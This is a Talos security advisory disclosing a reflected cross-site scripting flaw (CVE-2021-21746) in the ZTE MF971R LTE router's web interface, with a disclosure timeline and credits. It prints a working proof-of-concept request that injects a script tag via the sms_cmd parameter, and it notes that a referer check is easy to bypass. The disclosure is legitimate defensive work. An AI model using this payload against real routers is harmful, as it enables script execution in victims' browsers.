Talos Vulnerability Report

TALOS-2021-1318

ZTE MF971R sms_cmd_status_info cross-site scripting vulnerability

October 18, 2021

CVE Number

CVE-2021-21746

Summary

An exploitable Cross-Site-Scripting vulnerability exists in ZTE MF971R LTE router version wa_inner_version:BD_PLKPLMF971R1V1.0.0B06. A specially crafted HTTP request can cause an XSS vulnerability and as a result arbitrary JavaScript code execution in the victim’s browser. An attacker needs to provide an URL to the victim to trigger the vulnerability.

Tested Versions

ZTE Corporation MF971R wa_inner_version:BD_LVWRGBMF971RV1.0.0B01
ZTE Corporation MF971R wa_inner_version:BD_PLKPLMF971R1V1.0.0B06
ZTE Corporation MF971R zte_topsw_goahead - MD5 B2176B393A97B5BA13791FC591D2BE3F
ZTE Corporation MF971R zte_topsw_goahead - MD5 bf5ada32c9e8c815bfd51bfb5b8391cb

Product URLs

https://www.ztedevices.com/pl/product/zte-mf971r/

CVSSv3 Score

6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Details

MF971R its a portable router with WIFI support and LTE/GSM modem.

This vulnerability is present in sms_cmd_status_info API related code, which is a part of the ZTE MF971R web applications. A specially crafted URL sent by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.

A sms_cmd parameter being a part of sms_cmd_status_info API is not properly sanitized in a context of XSS payload and further reflected in a HTTP response.

Request example:

GET /goform/goform_get_cmd_process?cmd=sms_cmd_status_info&sms_cmd=1A"}<script>alert(1)</script>{" HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close
Referer: http://attacker.localdomain/127.0.0.1.html

Response

HTTP/1.1 200 OK
Server: WebServer-Webs
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block

{"sms_cmd":"1A"}<script>alert(1)</script>{"","sms_cmd_status_result":"3"}

The victim does not need to be logged-in to be affected by this vulnerability, the only constraint the attacker needs to pass is a referer check which is easy to bypass and discussed in TALOS-2021-1317

Timeline

2021-06-15 - Vendor disclosure
2021-09-14 - Disclosure extension granted
2021-10-15 - Vendor patched
2021-10-17 - Public release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

TALOS-2021-1319

TALOS-2021-1317

Intelligence Center

Vulnerability Information

Security Resources

Media

Company